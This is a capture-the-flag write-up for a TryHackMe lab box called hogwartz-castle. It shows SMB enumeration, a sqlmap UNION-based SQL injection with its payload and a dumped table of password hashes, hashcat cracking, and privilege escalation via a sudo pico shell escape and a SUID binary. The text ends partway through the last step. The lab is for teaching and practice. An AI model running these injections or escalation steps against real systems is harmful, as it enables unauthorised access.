Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 10 17:18:14 2021 -- 1 IP address (1 host up) scanned in 320.03 seconds
It is done. I registered the name you requested below but changed the "s" to a "z". You should be good to go.
RME
-------- On Tue, Nov 24, 2020 at 8:54 AM Madeye Moody <ctf@madeye.ninja> wrote: Mr. Roar M. Echo,
Sounds great! Thanks, your mentorship is exactly what we need to avoid legal troubles with the Ministry of Magic.
Magically Yours, madeye
-------- On Tue, Nov 24, 2020 at 8:53 AM Roar May Echo <info@roarmayecho.com> wrote: Madeye,
I don't think we can do "hogwarts" due to copyright issues, but let’s go with "hogwartz", how does that sound?
Roar
-------- On Tue, Nov 24, 2020 at 8:52 AM Madeye Moody <ctf@madeye.ninja> wrote: Dear Mr. Echo,
Thanks so much for helping me develop my castle for TryHackMe. I think it would be great to register the domain name of "hogwarts-castle.thm" for the box. I have been reading about virtual hosting in Apache and it's a great way to host multiple domains on the same server. The docs says that...
> The term Virtual Host refers to the practice of running more than one web site (such as > company1.example.com and company2.example.com) on a single machine. Virtual hosts can be > "IP-based", meaning that you have a different IP address for every web site, or "name-based", > meaning that you have multiple names running on each IP address. The fact that they are > running on the same physical server is not apparent to the end user.
You can read more here: https://httpd.apache.org/docs/2.4/vhosts/index.html
What do you think?
Thanks, madeye
The domain of the vhost should be hogwartz-castle.thm, we just have to add it:
[+] IP: hogwartz-castle.thm:445 Name: unknown Status: Guest session Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers sambashare READ ONLY Harry's Important Files IPC$ NO ACCESS IPC Service (hogwartz-castle server (Samba, Ubuntu))
We can mount the RO share sambashare with xdg-open smb://hogwartz-castle.thm/
And retrieve 2 files: spellnames.txt (list of words) and .notes containing 2
hints:
Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.
This seems like a stupid rabbit hole since BF using harry, hagrid,
hermonine doesn't work over HTTP form, SSH or SMB using that wordlist.
Ok the hint said spells names are not good but a wordlist + mentioning
rockyou is an invitation to BF.
But if instead of telling SQLmap to dump the 4 columns -C name,password,admin,notes
we only ask it to retrieve one at a time (eg. -C notes) it actually works but
it retrieves one row instead of 40.
Once I tried to extract the admin column containing boolean integers (0 or 1, but
actually only 0) I understood that was causing a casting issue. So I tried
to extract only columns returning string values -C name,password,notes but had
the same issue (only 1st row).
Then I tried only username and password an it worked -C name,password as
anyone would expect:
Database: <current> Table: users [40 entries] +------------------+----------------------------------------------------------------------------------------------------------------------------------+ | name | password | +------------------+----------------------------------------------------------------------------------------------------------------------------------+ | Lucas Washington | c53d7af1bbe101a6b45a3844c89c8c06d8ac24ed562f01b848cad9925c691e6f10217b6594532b9cd31aa5762d85df642530152d9adb3005fac407e2896bf492 | | Harry Turner | b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885 | | Andrea Phillips | e1ed732e4aa925f0bf125ae8ed17dd2d5a1487f9ff97df63523aa481072b0b5ab7e85713c07e37d9f0c6f8b1840390fc713a4350943e7409a8541f15466d8b54 | | Liam Hernandez | 5628255048e956c9659ed4577ad15b4be4177ce9146e2a51bd6e1983ac3d5c0e451a0372407c1c7f70402c3357fc9509c24f44206987b1a31d43124f09641a8d | | Adam Jenkins | 2317e58537e9001429caf47366532d63e4e37ecd363392a80e187771929e302922c4f9d369eda97ab7e798527f7626032c3f0c3fd19e0070168ac2a82c953f7b | | Landon Alexander | 79d9a8bef57568364cc6b4743f8c017c2dfd8fd6d450d9045ad640ab9815f18a69a4d2418a7998b4208d509d8e8e728c654c429095c16583cbf8660b02689905 | | Kennedy Anderson | e3c663d68c647e37c7170a45214caab9ca9a7d77b1a524c3b85cdaeaa68b2b5e740357de2508142bc915d7a16b97012925c221950fb671dd513848e33c33d22e | | Sydney Wright | d3ccca898369a3f4cf73cbfc8daeeb08346edf688dc9b7b859e435fe36021a6845a75e4eddc7a932e38332f66524bd7876c0c613f620b2030ed2f89965823744 | | Aaliyah Sanders | dc2a6b9462945b76f333e075be0bc2a9c87407a3577f43ba347043775a0f4b5c1a78026b420a1bf7da84f275606679e17ddc26bceae25dad65ac79645d2573c0 | | Olivia Murphy | 6535ee9d2b8d6f2438cf92da5a00724bd2539922c83ca19befedbe57859ceafd6d7b9db83bd83c26a1e070725f6f336e21cb40295ee07d87357c34b6774dd918 | | Olivia Ross | 93b4f8ce01b44dd25c134d0517a496595b0b081cef6eb625e7eb6662cb12dd69c6437af2ed3a5972be8b05cc14a16f46b5d11f9e27e6550911ed3d0fe656e04d | | Grace Brooks | 9a311251255c890692dc84b7d7d66a1eefc5b89804cb74d16ff486927014d97502b2f790fbd7966d19e4fbb03b5eb7565afc9417992fc0c242870ea2fd863d6d | | Jordan White | 5ed63206a19b036f32851def04e90b8df081071aa8ca9fb35ef71e4daf5e6c6eab3b3fea1b6e50a45a46a7aee86e4327f73a00f48deb8ae2bf752f051563cc8b | | Diego Baker | 87ac9f90f01b4b2ae775a7cb96a8a04d7ab7530282fd76224ee03eecab9114275540e4b6a2c52e890cf11f62aacb965be0c53c48c0e51bf731d046c5c3182aad | | Liam Ward | 88344d6b7724bc0e6e3247d4912fa755a5a91c2276e08610462f6ea005d16fd5e305dfe566e7f1dd1a98afe1abfa38df3d9697cdc47ecbb26ac4d21349d09ba7 | | Carlos Barnes | 7f67af71e8cbb7188dd187b7da2386cc800ab8b863c9d0b2dce87c98a91b5511330a2ad4f7d73592b50a2a26c26970cfbd22f915d1967cd92569dbf5e24ac77e | | Carlos Lopez | 8c8702dbb6de9829bcd6da8a47ab26308e9db7cb274b354e242a9811390462a51345f5101d7f081d36eea4ec199470162775c32cb1f4a96351dc385711619671 | | Oliver Gonzalez | c809b40b7c3c0f095390f3cd96bb13864b7e8fd1670c6b1c05b1e26151be62782b97391b120cb4a8ee1d0c9b8fffaf12b44c9d084ae6041468ad5f12ec3d7a4e | | Sophie Sanchez | 68b519187b9e2552d555cb3e9183711b939f94dfe2f71bda0172ee8402acf074cc0f000611d68d2b8e9502fa7235c8a25d72da50916ad0689e00cb4f47283e9b | | Maya Sanders | 7eea93d53fbed3ba8f2fa3d25c5f16fe5eaff1f5371918e0845d2076a2e952a457390ad87d289bf25f9457032f14bb07dcd625d03f2f5ee5c887c09dc7107a66 | | Joshua Reed | e49608634f7de91d19e5e1b906e10c5a4a855a4fe32521f310727c9875e823c82b3e0347b32ef49ea44657e60e771d9e326d40ab60ce3a950145f1a7a79d3124 | | Aaliyah Allen | c063c5215b56091327a1f25e38e2d0a5e6db83cceb0ab29cbb0bedd686c18ee5770bfbbfa0a4ac542c8935b0fb63e30ea0bc0408d3523157d840fdfa54ec8dab | | Jasmine King | 487daab566431e86172ed68f0836f3221592f91c94059a725d2fdca145f97e6258593929c37d0339ca68614a52f4df61953b930585c4968cedaaa836744c52a6 | | Jonathan Long | 44b1fbcbcd576b8fd69bf2118a0c2b82ccf8a6a9ef2ae56e8978e6178e55b61d491f6fc152d07f97ca88c6b7532f25b8cd46279e8a2c915550d9176f19245798 | | Samuel Anderson | a86fa315ce8ed4d8295bf6d0139f23ba80e918a54a132e214c92c76768f27ce002253834190412e33c9af4ea76befa066d5bdeb47363f228c509b812dc5d81df | | Julian Robinson | a1f6e38be4bf9fd307efe4fe05522b8c3a9e37fc2c2930507e48cb5582d81f73814ffb543cef77b4b24a18e70e2670668d1a5b6e0b4cb34af9706890bd06bbc9 | | Gianna Harris | 01529ec5cb2c6b0300ed8f4f3df6b282c1a68c45ff97c33d52007573774014d3f01a293a06b1f0f3eb6e90994cb2a7528d345a266203ef4cd3d9434a3a033ec0 | | Madelyn Morgan | d17604dbb5c92b99fe38648bbe4e0a0780f2f4155d58e7d6eddd38d6eceb62ae81e5e31a0a2105de30ba5504ea9c75175a79ed23cd18abcef0c8317ba693b953 | | Ella Garcia | ac67187c4d7e887cbaccc625209a8f7423cb4ad938ec8f50c0aa5002e02507c03930f02fab7fab971fb3f659a03cd224669b0e1d5b5a9098b2def90082dfdbd2 | | Zoey Gonzales | 134d4410417fb1fc4bcd49abf4133b6de691de1ef0a4cdc3895581c6ad19a93737cd63cb8d177db90bd3c16e41ca04c85d778841e1206193edfebd4d6f028cdb | | Abigail Morgan | afcaf504e02b57f9b904d93ee9c1d2e563d109e1479409d96aa064e8fa1b8ef11c92bae56ddb54972e918e04c942bb3474222f041f80b189aa0efd22f372e802 | | Joseph Rivera | 6487592ed88c043e36f6ace6c8b6c59c13e0004f9751b0c3fdf796b1965c48607ac3cc4256cc0708e77eca8e2df35b668f5844200334300a17826c033b03fe29 | | Elizabeth Cook | af9f594822f37da8ed0de005b940158a0837060d3300be014fe4a12420a09d5ff98883d8502a2aaffd64b05c7b5a39cdeb5c57e3005c3d7e9cadb8bb3ad39ddb | | Parker Cox | 53e7ea6c54bea76f1d905889fbc732d04fa5d7650497d5a27acc7f754e69768078c246a160a3a16c795ab71d4b565cde8fdfbe034a400841c7d6a37bdf1dab0d | | Savannah Torres | 11f9cd36ed06f0c166ec34ab06ab47f570a4ec3f69af98a3bb145589e4a221d11a09c785d8d3947490ae4cd6f5b5dc4eb730e4faeca2e1cf9990e35d4b136490 | | Aaliyah Williams | 9dc90274aef30d1c017a6dc1d5e3c07c8dd6ae964bcfb95cadc0e75ca5927faa4d72eb01836b613916aea2165430fc7592b5abb19b0d0b2476f7082bfa6fb760 | | Blake Washington | 4c968fc8f5b72fd21b50680dcddea130862c8a43721d8d605723778b836bcbbc0672d20a22874af855e113cba8878672b7e6d4fc8bf9e11bc59d5dd73eb9d10e | | Claire Miller | d4d5f4384c9034cd2c77a6bee5b17a732f028b2a4c00344c220fc0022a1efc0195018ca054772246a8d505617d2e5ed141401a1f32b804d15389b62496b60f24 | | Brody Stewart | 36e2de7756026a8fc9989ac7b23cc6f3996595598c9696cca772f31a065830511ac3699bdfa1355419e07fd7889a32bf5cf72d6b73c571aac60a6287d0ab8c36 | | Kimberly Murphy | 8f45b6396c0d993a8edc2c71c004a91404adc8e226d0ccf600bf2c78d33ca60ef5439ccbb9178da5f9f0cfd66f8404e7ccacbf9bdf32db5dae5dde2933ca60e6 | +------------------+----------------------------------------------------------------------------------------------------------------------------------+
Here a classic concat (with ||) is used instead of JSON_GROUP_ARRAY:
1
[10:46:57] [PAYLOAD] Harry' UNION SELECT 1337,1337,1337,(SELECT 'qxjxq'||name||'esuvev'||password||'qzjqq' FROM users LIMIT 39,1)-- asUH
Returning this kind of result:
1
{"error":"The password for 1337 is incorrect! qxjxqJoseph Riveraesuvev6487592ed88c043e36f6ace6c8b6c59c13e0004f9751b0c3fdf796b1965c48607ac3cc4256cc0708e77eca8e2df35b668f5844200334300a17826c033b03fe29qzjqq"}
There are 13 WU for this room, 100% of them abandonned using SQLmap and done it
manually. But most of them just tried to throw a command like that
sqlmap -r request --level 5 --risk 3 --dump-all --threads 10 and said
something like "SQLmap not working, let's try manually".
I increased debug verbosity to understand the payload that were sent and the answers received #troubleshooting
What did they do?
Some of them have tried a long time but send random option without understanding
Some of them may have read the wiki but not enough
None actually used -v 7 else they would have succeeded
Conclusion, what should you do next time?
Always try harder, it's rewarding
Always read the documentation
Pay attention to details
When you don't understand what's going on, go check the logs, increase verbosity, enable debug mode, etc.
Always try to understand what you are doing even with automatic tools, don't blindly execute automatic tools or copy answer from another write-up
Thank you for listening, that was a lesson from professor noraj.
Note: Some options I used like --tamper or --union-char are useless here.
Note2: One could argue "It's better to do it manually so you deeply understand all requests". Yes if it's the first time you're doing it you'll definitely learn something but when you did it manually a ton of time you expect to automate the process to save time and pain. Also manual exploitation is not guaranteed to make you learn more, for example for those blindly copy/pasting cheat-sheet payloads.
So it's more likely SHA-512 and we have already the hashcat and john identifier to use.
PS: haiti is already embedded in BlackArch and Pentoo and can also be install with one command on any distro using gem. But if you would like to see haiti on Kali or Parrot please comment the following issue on Kali Bug Tracker: ID 0006797 and Parrot Bug Tracker ID 17290.
I usually use JtR (John the Ripper, CPU based) since I don't have a dedicated GPU
on my laptop and openGL driver sucks anyway. But the hint is talking about
best64 which is the name of a Hashcat rule.
PS: If you want to learn more about hash cracking please do the Crack The Hash Level 2 THM room I created.
JtR works well with a file containing user:pass but not Hashcat so let's adapt
something Hashcat will accept:
1
$ cat hashes.txt| cut -d ':' -f 2 > hashes2.txt
We can then run hashcat providing the hashes to crack hashes2.txt, the wordlist to
use spellnames.txt and the rule to apply on the wordlist -r /usr/share/doc/hashcat/rules/best64.rule.
$ ssh harry@hogwartz-castle.thm The authenticity of host 'hogwartz-castle.thm (10.10.10.6)' can't be established. ED25519 key fingerprint is SHA256:aoBkBWztoybmKKG6fmaF81L3u4vOoka0W8OgIKh3E7Y. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'hogwartz-castle.thm' (ED25519) to the list of known hosts. harry@hogwartz-castle.thm's password: _ __ __ __ __ __ __ | | /| / /__ / /______ __ _ ___ / /____ / // /__ ___ __ _____ _____/ /____ | |/ |/ / -_) / __/ _ \/ ' \/ -_) / __/ _ \ / _ / _ \/ _ `/ |/|/ / _ `/ __/ __/_ / |__/|__/\__/_/\__/\___/_/_/_/\__/ \__/\___/ /_//_/\___/\_, /|__,__/\_,_/_/ \__//__/ /___/
Last login: Thu Nov 26 01:42:18 2020 harry@hogwartz-castle:~$
Basic foothold:
1 2 3 4 5 6 7 8 9 10 11 12 13
harry@hogwartz-castle:~$ id uid=1001(harry) gid=1001(harry) groups=1001(harry) harry@hogwartz-castle:~$ ls -lhA total 24K lrwxrwxrwx 1 root root 9 Nov 26 01:06 .bash_history -> /dev/null -rw-r----- 1 harry harry 220 Apr 4 2018 .bash_logout -rw-r----- 1 harry harry 3.7K Apr 4 2018 .bashrc drwx------ 2 harry harry 4.0K Nov 26 01:17 .cache drwx------ 3 harry harry 4.0K Nov 26 01:17 .gnupg -rw-r----- 1 harry harry 807 Apr 4 2018 .profile -rw-r----- 1 harry harry 40 Nov 26 01:06 user1.txt harry@hogwartz-castle:~$ cat user1.txt RME{edited}
So we can find something very suspicious from the start:
1 2 3 4 5 6 7 8
harry@hogwartz-castle:~$ sudo -l [sudo] password for harry: Matching Defaults entries for harry on hogwartz-castle: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User harry may run the following commands on hogwartz-castle: (hermonine) /usr/bin/pico (hermonine) /usr/bin/pico
Elevation of Privilege (EoP): from harry to hermonine#
My prefered way to quickly check GTFObin is by using gtfoblookup:
1 2 3 4 5 6 7 8
$ gtfoblookup linux sudo pico pico:
sudo:
Code: sudo pico ^R^X reset; sh 1>&0 2>&0
By running sudo -u hermonine /usr/bin/pico and executing the GTFO steps we
have a shell as hermonine:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
$ id uid=1002(hermonine) gid=1002(hermonine) groups=1002(hermonine)
Elevation of Privilege (EoP): from hermonine to root#
Looking for SUID files I found an unusual swagger binary:
1 2 3 4 5 6 7 8 9 10
$ find / -perm -u=s -type f 2>/dev/null /srv/time-turner/swagger /usr/bin/sudo /usr/bin/pkexec /usr/bin/chsh /usr/bin/chfn /usr/bin/newuidmap ... $ ls -lhA /srv/time-turner/swagger -rwsr-xr-x 1 root root 8.7K Nov 26 01:06 /srv/time-turner/swagger
It looks like a weird binary asking to guess a random number.
1 2 3 4 5 6 7 8
$ /srv/time-turner/swagger Guess my number: 8 Nope, that is not what I was thinking I was thinking of 1860847828 $ /srv/time-turner/swagger Guess my number: 8 Nope, that is not what I was thinking I was thinking of 1908602051
It is using setuid, is dynamically linked and is not stripped:
1 2
$ file /srv/time-turner/swagger /srv/time-turner/swagger: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=36c89f8b196c651950f369719ff6e50f1b427ff8, not stripped
I won't pretend to do some reverse engineering I just executed string:
$ strings /srv/time-turner/swagger | head -50 /lib64/ld-linux-x86-64.so.2 libc.so.6 fflush srand setregid __isoc99_scanf puts time setreuid __stack_chk_fail printf stdout system __cxa_finalize __libc_start_main GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable AWAVI AUATL []A\A]A^A_ Nice use of the time-turner! This system architecture is uname -p Guess my number: Nope, that is not what I was thinking I was thinking of %d ;*3$" GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7698 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry swagger.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini impressive _ITM_deregisterTMCloneTable stdout@@GLIBC_2.2.5
This part looks interesting:
1 2 3 4 5 6
Nice use of the time-turner! This system architecture is uname -p Guess my number: Nope, that is not what I was thinking I was thinking of %d
It seems if we correctly guess the number it will return:
But as the uname execution occurs after the correct number has been found we need
to find a way to bypass that before.
The binary tell us the expected number if we fail and as it is using time if
we execute the binary two time successively very quickly it will have the same
number.
There is a hint telling us we can use pwntools but I don't want to use it: